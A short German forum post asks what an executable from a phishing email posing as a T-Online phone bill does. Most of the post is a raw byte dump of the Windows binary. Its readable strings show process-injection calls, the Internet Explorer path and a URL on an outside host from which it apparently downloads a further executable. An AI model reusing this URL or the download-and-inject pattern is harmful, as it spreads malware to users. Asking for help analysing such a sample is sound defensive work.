Ahoi
Kann jemand sagen was diese Datei als Exe anstellt?
War bei einer Mail die die Telefonrechnung von T-Online vorgaukelt.
MZ @ Fv;'A;'A;'A;'A/'A
A:'A!A:'ARich;'A PE L U{B
@ @ < 0 D .text j
`.data @ .rsrc 0 @ @ 8 * H j X U.08 5ɽͽѸ9Q a&. .`&u.a&u.c &v@@&uң, ɱ U` UI1ݹQ
AU&ӣ4 *ɹȸ U&$ ɱ րU&c0
ɕѕ րU&SL
ɕѕ5 րU&C8 5Y= րU&30 M րU&# ]ᕍ րU&@ UY= րU&0
͕! րU&0 Aɽ րU&4 مȸ U&T
եɕ
ѕ րU&ã@
ɕѕ!͡ րU&8
!͡х րU&H
!͡AɅ րU&D
ɽ!͡ րU&P
I͕
ѕ րU&s< Uc <; AAA 6]AUAA A 6]US< &AAA AրUC<X &p&`AAA pU3 < &` րU#&P 6AU, 6AU <& 6 AAA ְU * P` U 1 6A6A U p@ .@6Ϛ< U ְUs`UpUրU<D6 ]U(aҧpAU' UĨh!@ h j h!@ h h"@ h!@ j j h!@ 5!@ 5!@ EP fE E h j@v Eh!@ u uus EPEPj j j jj j uh!@ u8 E RSQhz j PлD@ z BCXY[Z h @ 5 @ h~!@ @ j@h hz j 5 @ @ z P @ j hz 5 @ 5 @ 5 @ 5 @ h& @ 55 @ f = @ h @ 55 @ Q 9 @ [j hD h9 @ S5 @ W j j S5 @ j j 5 @
j %<@ %4@ %0@ % @ %@ %@ %@ %@ %8@ %$@ %(@ %,@ %@ % @ %@ $ \ 8 * H j X B CreateProcessA D CreateRemoteThread u ExitProcess )GetProcAddress ;GetStartupInfoA LoadLibraryA LocalAlloc LocalFree VirtualAllocEx WriteProcessMemory lstrcatA lstrcpyA KERNEL32.dll ERegCloseKey \RegOpenKeyExA eRegQueryValueExA ADVAPI32.dll kernel32.dll LoadLibraryA GetProcAddress +ċXeAur&http://edgefilmsny.com/images/bio/test.exe about
:blank Software\Microsoft\Windows\CurrentVersion\App Paths\IEXPLORE.EXE iexplore.exe 8 P h 0 3 0 ( @ wwwwwwwwwww ppx xp w x xppx xpx p wwwwwqw ww
Gre
Seebaer